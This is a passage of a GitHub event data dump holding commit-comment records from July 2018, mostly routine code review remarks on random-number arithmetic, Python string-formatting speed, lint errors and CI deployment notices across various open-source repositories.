C812 missing trailing comma\nplone/behavior/interfaces.py:89:25: C812 missing trailing comma\nplone/behavior/registration.py:56:39: C812 missing trailing comma\nplone/behavior/registration.py:57:14: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-21T20:36:49Z"}
{"id":"7999164201","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789940,"position":65,"line":65,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:36:52Z","updated_at":"2018-07-21T20:36:52Z","author_association":"NONE","body":"Replacing the entire line, or just `(Random.randomFloat() + Random.randomFloat() - 1)`?"}},"created_at":"2018-07-21T20:36:52Z"}
{"id":"7999170531","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789954,"position":65,"line":65,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:42:24Z","updated_at":"2018-07-21T20:42:24Z","author_association":"OWNER","body":"`float randomBonus = (0.85f + Random.randomFloat() * 0.3)`\r\n\r\nGenerating random numbers can be a bit of math and you want to avoid it when possible. Multiplying a single random number by 2 is effectively the same as adding 2 random numbers onto each other."}},"created_at":"2018-07-21T20:42:24Z"}
{"id":"7999171846","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789959,"position":11,"line":11,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentVerbose.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:43:34Z","updated_at":"2018-07-21T20:43:34Z","author_association":"NONE","body":"The config actually was something similar to what you're suggesting, _but_ I decided scale back the scope of this plugin because as I want this plugin to be as discreet as possible. This plugins isn't _meant_ to provide a complete overhaul to enchanting, but rather just allowing non-standard items to be enchantable at an enchanting table. That being said, I do completely agree with you that such a configuration would be highly useful. But It would be for a new plugin for that very purpose."}},"created_at":"2018-07-21T20:43:34Z"}
{"id":"7999172156","type":"CommitCommentEvent","actor":{"login":"robsob91"},"repo":{"name":"TES3MP/openmw-tes3mp"},"payload":{"comment":{"id":29789962,"position":null,"line":null,"path":null,"commit_id":"64b5638d40bd08bb1b84eeeea0d23d0e4c6d1414","created_at":"2018-07-21T20:43:51Z","updated_at":"2018-07-21T20:43:51Z","author_association":"NONE","body":"Absolutely wonderful"}},"created_at":"2018-07-21T20:43:51Z"}
{"id":"7999172640","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29789964,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:44:18Z","updated_at":"2018-07-21T20:44:18Z","author_association":"CONTRIBUTOR","body":"it might be worth timing it. perhaps the `f\"{something}\"` might be faster than `str(something)` as it removes the function call."}},"created_at":"2018-07-21T20:44:18Z"}
{"id":"7999173041","type":"CommitCommentEvent","actor":{"login":"StoneSet"},"repo":{"name":"retrobox/api"},"payload":{"comment":{"id":29789969,"position":null,"line":null,"path":null,"commit_id":"05e37e43c403d784bd80dae3cdfd10caee2a082d","created_at":"2018-07-21T20:44:40Z","updated_at":"2018-07-21T20:44:40Z","author_association":"MEMBER","body":"🤔 "}},"created_at":"2018-07-21T20:44:40Z"}
{"id":"7999173529","type":"CommitCommentEvent","actor":{"login":"divinity76"},"repo":{"name":"ethereum-mining/ethminer"},"payload":{"comment":{"id":29789972,"position":null,"line":null,"path":null,"commit_id":"7b3cc3066f99add980df8af02a5f79c19b07be96","created_at":"2018-07-21T20:45:07Z","updated_at":"2018-07-21T20:45:07Z","author_association":"CONTRIBUTOR","body":"i guess ~0u pushes 4 bytes, and ~0UL pushes 8 bytes"}},"created_at":"2018-07-21T20:45:07Z"}
{"id":"7999174234","type":"CommitCommentEvent","actor":{"login":"msohailamjad"},"repo":{"name":"eudaq/eudaq"},"payload":{"comment":{"id":29789977,"position":null,"line":null,"path":null,"commit_id":"dfad754c4466c29652148bb40e4f8ce351bb3b9c","created_at":"2018-07-21T20:45:40Z","updated_at":"2018-07-21T20:45:40Z","author_association":"CONTRIBUTOR","body":"@dreyling The ROOT Converter should work as long as it gets compiled (and that happens if CMAKE can find ROOT). As the example program on following link explains, ROOT can be installed in two ways, i.e. with or without CMAKE.  \r\nhttps://root.cern.ch/how/integrate-root-my-project-cmake\r\n  If it was installed in classic way (i.e. configure - make) , one can simply copy the FindROOT.cmake from $ROOTSYS/etc/cmake/FindROOT.cmake to eudaq/cmake. In CMAKE installation type, one just needs to point CMAKE_PREFIX_PATH to the installation path of ROOT. \r\n "}},"created_at":"2018-07-21T20:45:40Z"}
{"id":"7999175402","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789978,"position":257,"line":257,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentVerbose.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:46:40Z","updated_at":"2018-07-21T20:46:40Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:46:40Z"}
{"id":"7999175431","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29789979,"position":null,"line":null,"path":null,"commit_id":"74e784a2d4871bc0d082be8f1538c5a0b5819a5f","created_at":"2018-07-21T20:46:42Z","updated_at":"2018-07-21T20:46:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-334](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-334).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-334-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T20:46:42Z"}
{"id":"7999175738","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29789982,"position":null,"line":null,"path":null,"commit_id":"53ea81a46e2637be394c70bb5d48d0fe6e3a3bbb","created_at":"2018-07-21T20:46:58Z","updated_at":"2018-07-21T20:46:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-335](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-335).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-335-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T20:46:58Z"}
{"id":"7999176211","type":"CommitCommentEvent","actor":{"login":"justinkenel"},"repo":{"name":"Dember224/conspire"},"payload":{"comment":{"id":29789983,"position":27,"line":27,"path":"src/components/participant.js","commit_id":"ff6884f01f828b9e20ce8fa76a6e4826cc74e6e5","created_at":"2018-07-21T20:47:22Z","updated_at":"2018-07-21T20:47:22Z","author_association":"NONE","body":"because you're passing in the same value for `score`, it will show the same for each player.\r\n\r\nif score was instead:\r\n\r\n```\r\nthis.state={score: {}}; // it's a dictionary with one entry per person\r\n```\r\n\r\nyou could do something like:\r\n\r\n```\r\n... <Score score={this.state.score[i]} onScore={() => this.increaseScore(i)} />\r\n```\r\n\r\nWhere increase score takes the player number"}},"created_at":"2018-07-21T20:47:22Z"}
{"id":"7999176403","type":"CommitCommentEvent","actor":{"login":"PeterQuinn925"},"repo":{"name":"PeterQuinn925/jevoisbase"},"payload":{"comment":{"id":29789984,"position":null,"line":null,"path":null,"commit_id":"793e3b12ec21f46814bb1a639c148bbee1567a3f","created_at":"2018-07-21T20:47:33Z","updated_at":"2018-07-21T20:47:33Z","author_association":"OWNER","body":"Works now - needed a change to Yolo.C"}},"created_at":"2018-07-21T20:47:33Z"}
{"id":"7999177930","type":"CommitCommentEvent","actor":{"login":"madig"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29789990,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:48:50Z","updated_at":"2018-07-21T20:48:50Z","author_association":"CONTRIBUTOR","body":"You're right:\r\n```\r\nIn [6]: class A:\r\n   ...:     def __repr__(self):\r\n   ...:         return \"repr\"\r\n   ...:     def __str__(self):\r\n   ...:         return \"str\"\r\n   ...:\r\n\r\nIn [7]: a=A()\r\n\r\nIn [8]: %timeit str(a)\r\n207 ns ± 0.119 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)\r\n\r\nIn [9]: %timeit f\"{a}\"\r\n13.4 ns ± 0.043 ns per loop (mean ± std. dev. of 7 runs, 100000000 loops each)\r\n```\r\nNow, the harder question is: is this gain worth the somewhat confusing code? :grin:"}},"created_at":"2018-07-21T20:48:50Z"}
{"id":"7999179371","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789992,"position":2,"line":2,"path":"src/main/resources/META-INF/MANIFEST.MF","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:50:09Z","updated_at":"2018-07-21T20:50:09Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:50:09Z"}
{"id":"7999181952","type":"CommitCommentEvent","actor":{"login":"hugovk"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29789997,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:51:58Z","updated_at":"2018-07-21T20:51:58Z","author_association":"NONE","body":"Similar results, `f\"{something}\"` is faster:\r\n\r\n```console\r\n$ python -m timeit 'something=\"abc\"; f\"{something}\"'\r\n10000000 loops, best of 5: 30.9 nsec per loop\r\n\r\n$ python -m timeit 'something=\"abc\"; str(something)'\r\n1000000 loops, best of 5: 205 nsec per loop\r\n```\r\n\r\nI doubt this is bottleneck code worth worrying about much, but let me know if you'd prefer the f-string version. "}},"created_at":"2018-07-21T20:51:58Z"}
{"id":"7999183193","type":"CommitCommentEvent","actor":{"login":"paulrosen"},"repo":{"name":"tobyspark/abcjs"},"payload":{"comment":{"id":29790000,"position":null,"line":null,"path":null,"commit_id":"d78683f2fd4cecc609117bbfed3442bea66009a8","created_at":"2018-07-21T20:53:03Z","updated_at":"2018-07-21T20:53:03Z","author_association":"NONE","body":"I'm not using any syntax newer than ES5 yet in the project - the `const` could be `var`."}},"created_at":"2018-07-21T20:53:03Z"}
{"id":"7999183704","type":"CommitCommentEvent","actor":{"login":"madig"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29790003,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:53:32Z","updated_at":"2018-07-21T20:53:32Z","author_association":"CONTRIBUTOR","body":"Hm. Nah, I'd prefer the str version for clarity. BTW:\r\n```\r\nIn [10]: %timeit \"{}\".format(a)\r\n315 ns ± 2.77 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)\r\n```\r\nIt's a net win over `.format()` either way ;)"}},"created_at":"2018-07-21T20:53:32Z"}
{"id":"7999183707","type":"CommitCommentEvent","actor":{"login":"raphw"},"repo":{"name":"raphw/byte-buddy"},"payload":{"comment":{"id":29790004,"position":5,"line":30,"path":"byte-buddy-benchmark/pom.xml","commit_id":"fcd92dd51ad1de19569677912def1c56b41b6766","created_at":"2018-07-21T20:53:32Z","updated_at":"2018-07-21T20:53:32Z","author_association":"OWNER","body":"@gsmet The 23 version does no longer support Java 6. It references the `MethodHandle` class. I am typically running benchmarks on Java 6, Java 8 and Java 11 as they often spread quite a bit with regards to what is slow. Therefore, I want to continue using the older version."}},"created_at":"2018-07-21T20:53:32Z"}
{"id":"7999184184","type":"CommitCommentEvent","actor":{"login":"divinity76"},"repo":{"name":"ethereum-mining/ethminer"},"payload":{"comment":{"id":29790005,"position":null,"line":null,"path":null,"commit_id":"7b3cc3066f99add980df8af02a5f79c19b07be96","created_at":"2018-07-21T20:54:00Z","updated_at":"2018-07-21T20:54:00Z","author_association":"CONTRIBUTOR","body":"perhaps it would be more readable if you replaced `~0UL` with `uint64_t(0)` and `~0u` with `uint32_t(0)`   ?"}},"created_at":"2018-07-21T20:54:00Z"}
{"id":"7999184800","type":"CommitCommentEvent","actor":{"login":"Tsugoshi"},"repo":{"name":"Tsugoshi/ShoppingList"},"payload":{"comment":{"id":29790007,"position":null,"line":null,"path":null,"commit_id":"d9efeec5219762aeb180d25d41b47dfa573dfcac","created_at":"2018-07-21T20:54:31Z","updated_at":"2018-07-21T20:54:31Z","author_association":"OWNER","body":"Git init"}},"created_at":"2018-07-21T20:54:31Z"}
{"id":"7999184934","type":"CommitCommentEvent","actor":{"login":"paulrosen"},"repo":{"name":"tobyspark/abcjs"},"payload":{"comment":{"id":29790008,"position":null,"line":null,"path":null,"commit_id":"d78683f2fd4cecc609117bbfed3442bea66009a8","created_at":"2018-07-21T20:54:40Z","updated_at":"2018-07-21T20:54:40Z","author_association":"NONE","body":"Thanks for the bug find!"}},"created_at":"2018-07-21T20:54:40Z"}
{"id":"7999186354","type":"CommitCommentEvent","actor":{"login":"enzobrunii"},"repo":{"name":"Estebank94/Provi"},"payload":{"comment":{"id":29790010,"position":66,"line":50,"path":"src/components/views/Home/postCard.js","commit_id":"af1b389648d1aa994eefebd71df17884719a0e0f","created_at":"2018-07-21T20:55:49Z","updated_at":"2018-07-21T20:55:49Z","author_association":"COLLABORATOR","body":"estaba mal esto\r\n"}},"created_at":"2018-07-21T20:55:49Z"}
{"id":"7999186620","type":"CommitCommentEvent","actor":{"login":"blackninja9939"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29790012,"position":1227,"line":814,"path":"The_Seven_Kingdoms/common/laws/succession_laws.txt","commit_id":"aedf2135c6befe42190963415e8a2857e44abc16","created_at":"2018-07-21T20:56:04Z","updated_at":"2018-07-21T20:56:04Z","author_association":"COLLABORATOR","body":"This is really getting old. It is not even the first time this has happened here with people in the team just grabbing stuff right from AGOT, nor probably the last.\r\n\r\nLike I am not trying to be petty or anything but come one, you can't just make a pretty map with history then populate it with content from other people's mods. Make your own content come on guys.\r\n\r\nLike when it comes down to copying stuff that flat out does not exist in TSK, or when the comments are identical to ones from AGOT, or it is script I remember writing it is so easy to see this happening and is not cool ☹️"}},"created_at":"2018-07-21T20:56:04Z"}
{"id":"7999187363","type":"CommitCommentEvent","actor":{"login":"hugovk"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29790014,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:56:43Z","updated_at":"2018-07-21T20:56:43Z","author_association":"NONE","body":"And all better than `\"{0}\".format() :)\r\n\r\n```console\r\n$ python -m timeit 'something=\"abc\"; \"{}\".format(something)'\r\n1000000 loops, best of 5: 227 nsec per loop\r\n\r\n$ python -m timeit 'something=\"abc\"; \"{0}\".format(something)'\r\n1000000 loops, best of 5: 235 nsec per loop\r\n```\r\n"}},"created_at":"2018-07-21T20:56:43Z"}
{"id":"7999187703","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29790015,"position":null,"line":null,"path":null,"commit_id":"80b010587aa6460bfc88d7fc22fa70cbf8b673a3","created_at":"2018-07-21T20:57:03Z","updated_at":"2018-07-21T20:57:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-337](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-337).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-337-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T20:57:03Z"}
{"id":"7999189049","type":"CommitCommentEvent","actor":{"login":"bahelit"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29790018,"position":null,"line":null,"path":null,"commit_id":"8d91b9dbbbd30af39fd86b4b2fb19dac80c1eb35","created_at":"2018-07-21T20:58:17Z","updated_at":"2018-07-21T20:58:17Z","author_association":"OWNER","body":"Added clo.html and see that CLO.html was added. Let's decide which to use (upper or lower case)."}},"created_at":"2018-07-21T20:58:17Z"}
{"id":"7999190923","type":"CommitCommentEvent","actor":{"login":"Pangar"},"repo":{"name":"aspnet/Docs"},"payload":{"comment":{"id":29790023,"position":null,"line":null,"path":null,"commit_id":"1f96d532979cbef89131134243652ed3e2353517","created_at":"2018-07-21T20:59:58Z","updated_at":"2018-07-21T20:59:58Z","author_association":"NONE","body":"Please disregard. I finally updated to 2.1 and see the changes."}},"created_at":"2018-07-21T20:59:58Z"}
{"id":"7999190991","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29790024,"position":null,"line":null,"path":null,"commit_id":"80b010587aa6460bfc88d7fc22fa70cbf8b673a3","created_at":"2018-07-21T21:00:01Z","updated_at":"2018-07-21T21:00:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-341](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-341).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-341-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T21:00:01Z"}
{"id":"7999191289","type":"CommitCommentEvent","actor":{"login":"tobyspark"},"repo":{"name":"tobyspark/abcjs"},"payload":{"comment":{"id":29790027,"position":null,"line":null,"path":null,"commit_id":"d78683f2fd4cecc609117bbfed3442bea66009a8","created_at":"2018-07-21T21:00:10Z","updated_at":"2018-07-21T21:00:10Z","author_association":"OWNER","body":"Thanks for abcjs!"}},"created_at":"2018-07-21T21:00:10Z"}
{"id":"7999193817","type":"CommitCommentEvent","actor":{"login":"rromanchuk"},"repo":{"name":"aws-samples/amazon-vod-preset-convert"},"payload":{"comment":{"id":29790037,"position":793,"line":793,"path":"ets_mediaconvert_preset_v2.py","commit_id":"ccf6277965ddb9b14dc4a4fff2af6635831099a8","created_at":"2018-07-21T21:02:07Z","updated_at":"2018-07-21T21:02:07Z","author_association":"NONE","body":"This causes a crashes a crash in `translate_thumbnails` if using the `-i` flag,  because `args.etsid` is null"}},"created_at":"2018-07-21T21:02:07Z"}
{"id":"7999193930","type":"CommitCommentEvent","actor":{"login":"bahelit"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29790040,"position":null,"line":null,"path":null,"commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-21T21:02:13Z","updated_at":"2018-07-21T21:02:13Z","author_association":"OWNER","body":"Awesome! Literally just figured what was missing when creating a new page.  Created clo.html and added content explaining how to connect."}},"created_at":"2018-07-21T21:02:13Z"}
{"id":"7999195016","type":"CommitCommentEvent","actor":{"login":"someblu"},"repo":{"name":"fang2hou/ElvUI_WindTools"},"payload":{"comment":{"id":29790045,"position":null,"line":null,"path":null,"commit_id":"0877462b7a255b2ed74e6cfac32ba752a190240e","created_at":"2018-07-21T21:03:15Z","updated_at":"2018-07-21T21:03:15Z","author_association":"COLLABORATOR","body":"[文中](http://www.wowinterface.com/forums/showpost.php?p=327644&postcount=6)提到C_Map.GetBestMapForUnit('player')在插件载入早期会返回nil，也因此导致换图报错。因而给mapID添加了默认值0，此时taskInfo值为空。"}},"created_at":"2018-07-21T21:03:15Z"}
{"id":"7999195616","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29790046,"position":19,"line":19,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Food2Door/App.java","commit_id":"13ae33695f51df1089d52dfd996a9eb6c95fca6c","created_at":"2018-07-21T21:03:51Z","updated_at":"2018-07-21T21:03:51Z","author_association":"NONE","body":"Co się dzieje dalej? Samo wyświetlenie to z mało\r\n"}},"created_at":"2018-07-21T21:03:51Z"}
{"id":"7999198481","type":"CommitCommentEvent","actor":{"login":"rgburke"},"repo":{"name":"rgburke/grv"},"payload":{"comment":{"id":29790049,"position":null,"line":null,"path":null,"commit_id":"52dcf7fc47c2ea535fe0527310f759938ee437c6","created_at":"2018-07-21T21:06:17Z","updated_at":"2018-07-21T21:06:17Z","author_association":"OWNER","body":"Thanks @marcelpaulo. My hope is that this view will make life easier for people when they start embedding variables in commands. So that it's clear which actions affect the value of a variable.\r\n\r\nIt's still early days yet though, most variables aren't set yet 😄 "}},"created_at":"2018-07-21T21:06:17Z"}
{"id":"7999201215","type":"CommitCommentEvent","actor":{"login":"HMack101"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29790053,"position":null,"line":null,"path":null,"commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-21T21:08:55Z","updated_at":"2018-07-21T21:08:55Z","author_association":"COLLABORATOR","body":"Check out clo-content.html\nAnd rvn-content.html\n\nOn Sat, Jul 21, 2018, 4:02 PM Salmon Pool <notifications@github.com> wrote:\n\n> Awesome! Literally just figured what was missing when creating a new page.\n> Created clo.html and added content explaining how to connect.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bahelit/salmonpool-ui/commit/61adb1139dd59674c3ac9391594493757d4298a4#commitcomment-29790040>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK7dXRiOI_qGRIdzVjVruujdNgVupbRXks5uI5bVgaJpZM4VZwxl>\n> .\n>\n"}},"created_at":"2018-07-21T21:08:55Z"}
{"id":"7999201950","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29790054,"position":65,"line":65,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T21:09:36Z","updated_at":"2018-07-21T21:09:36Z","author_association":"NONE","body":"`Random.randomFloat() + Random.randomFloat()` is in [0,2] so you can replace it with `Random.randomFloat() * 2` without harm. Then, you can distribute the 0.15 into the parens to get `1 + (Random.randomFloat() * 2 * 0.15f - 0.15f)`, which simplifies to `0.85f + Random.randomFloat() * 0.3f` like Max said. Full line is\r\n\r\n    Float randomBonus = 0.85f + Random.randomFloat() * 0.3f;\r\n\r\nalthough this should really be a lowercase prim `float`, not an uppercase `Float` object."}},"created_at":"2018-07-21T21:09:36Z"}
{"id":"7999202135","type":"CommitCommentEvent","actor":{"login":"Ulduar"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790055,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T21:09:47Z","updated_at":"2018-07-21T21:09:47Z","author_association":"OWNER","body":"О, салют! Я нормально, а как ты? "}},"created_at":"2018-07-21T21:09:47Z"}
{"id":"7999209135","type":"CommitCommentEvent","actor":{"login":"radheyaafre"},"repo":{"name":"radheyaafre/demo"},"payload":{"comment":{"id":29790068,"position":null,"line":null,"path":null,"commit_id":"bfd7c83ebdf90125ab1039b7e5fc2d92bb544ffc","created_at":"2018-07-21T21:16:00Z","updated_at":"2018-07-21T21:16:00Z","author_association":"OWNER","body":"removed"}},"created_at":"2018-07-21T21:16:00Z"}
{"id":"7999210303","type":"CommitCommentEvent","actor":{"login":"FireCulex"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29790070,"position":null,"line":null,"path":null,"commit_id":"b7f4989bb6b5bc50b5e924fb028f41dbc598ee02","created_at":"2018-07-21T21:17:02Z","updated_at":"2018-07-21T21:17:02Z","author_association":"NONE","body":"Signed-off-by: Matthew M. Dean fireculex@gmail.com"}},"created_at":"2018-07-21T21:17:02Z"}
{"id":"7999211376","type":"CommitCommentEvent","actor":{"login":"WeeGoSh"},"repo":{"name":"TeamSparkIceland/ts17-ams-monitor"},"payload":{"comment":{"id":29790071,"position":34,"line":34,"path":"portscan.go","commit_id":"06c8e65a6871b1f0473a7409c7e0bf9d98c92ccd","created_at":"2018-07-21T21:18:01Z","updated_at":"2018-07-21T21:18:01Z","author_association":"CONTRIBUTOR","body":"Because the `err != nil` condition will return when it is matched => `return false`, then there is no need to wrap the rest of the code in the else clause. You can just make that code follow the if statement, saving one indent depth."}},"created_at":"2018-07-21T21:18:01Z"}
{"id":"7999214401","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29790076,"position":null,"line":null,"path":null,"commit_id":"93b75c88c42e591f6fde0136a91d0481caa8ad34","created_at":"2018-07-21T21:20:52Z","updated_at":"2018-07-21T21:20:52Z","author_association":"NONE","body":"Thank you very much"}},"created_at":"2018-07-21T21:20:52Z"}
{"id":"7999214739","type":"CommitCommentEvent","actor":{"login":"fredfortier"},"repo":{"name":"enigmampc/surface"},"payload":{"comment":{"id":29790077,"position":5,"line":2,"path":"src/surface/config.json","commit_id":"1deb3e5abb01907a141a67f3d940193099beb9ef","created_at":"2018-07-21T21:21:10Z","updated_at":"2018-07-21T21:21:10Z","author_association":"CONTRIBUTOR","body":"I'm using the command line arguments now, not the config file. This should not happen anymore as I have no reason to edit the file."}},"created_at":"2018-07-21T21:21:10Z"}
{"id":"7999216227","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790081,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T21:22:29Z","updated_at":"2018-07-21T21:22:29Z","author_association":"CONTRIBUTOR","body":"I realize I don't know what you mean by double upload - can you point me to what you mean?"}},"created_at":"2018-07-21T21:22:29Z"}
{"id":"7999227374","type":"CommitCommentEvent","actor":{"login":"tyborall"},"repo":{"name":"danielperna84/pyhomematic"},"payload":{"comment":{"id":29790101,"position":null,"line":null,"path":null,"commit_id":"200e652af1c074b99aaecf3184e4138307586b93","created_at":"2018-07-21T21:32:14Z","updated_at":"2018-07-21T21:32:14Z","author_association":"NONE","body":"Just an idea: Should this not go to a separate class like IPThermostatGroup, even if it behaves like a standard HmIP Thermostat?"}},"created_at":"2018-07-21T21:32:14Z"}
{"id":"7999228249","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790103,"position":null,"line":null,"path":null,"commit_id":"20c9a9ef3eb2f109fe193549bff44314d363ae7e","created_at":"2018-07-21T21:33:02Z","updated_at":"2018-07-21T21:33:02Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-894](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-894).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-894-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T21:33:02Z"}
{"id":"7999229326","type":"CommitCommentEvent","actor":{"login":"danielperna84"},"repo":{"name":"danielperna84/pyhomematic"},"payload":{"comment":{"id":29790111,"position":null,"line":null,"path":null,"commit_id":"200e652af1c074b99aaecf3184e4138307586b93","created_at":"2018-07-21T21:34:02Z","updated_at":"2018-07-21T21:34:02Z","author_association":"OWNER","body":"As long as there are no differences which require a separate class that's unnecessary. That would just be duplicate code."}},"created_at":"2018-07-21T21:34:02Z"}
{"id":"7999236539","type":"CommitCommentEvent","actor":{"login":"jensens"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29790125,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T21:40:50Z","updated_at":"2018-07-21T21:40:50Z","author_association":"MEMBER","body":"But yes, it should be updated. As long as there no breaking changes it should be kept in sync. "}},"created_at":"2018-07-21T21:40:50Z"}
{"id":"7999236935","type":"CommitCommentEvent","actor":{"login":"Phan-Giang"},"repo":{"name":"Phan-Giang/MyWebShop"},"payload":{"comment":{"id":29790127,"position":null,"line":null,"path":null,"commit_id":"b4cd93f4a87aca0ccc3439f4702fcfac647ce2b0","created_at":"2018-07-21T21:41:14Z","updated_at":"2018-07-21T21:41:14Z","author_association":"OWNER","body":"dfsdfsdfsdfsdfsdf"}},"created_at":"2018-07-21T21:41:14Z"}
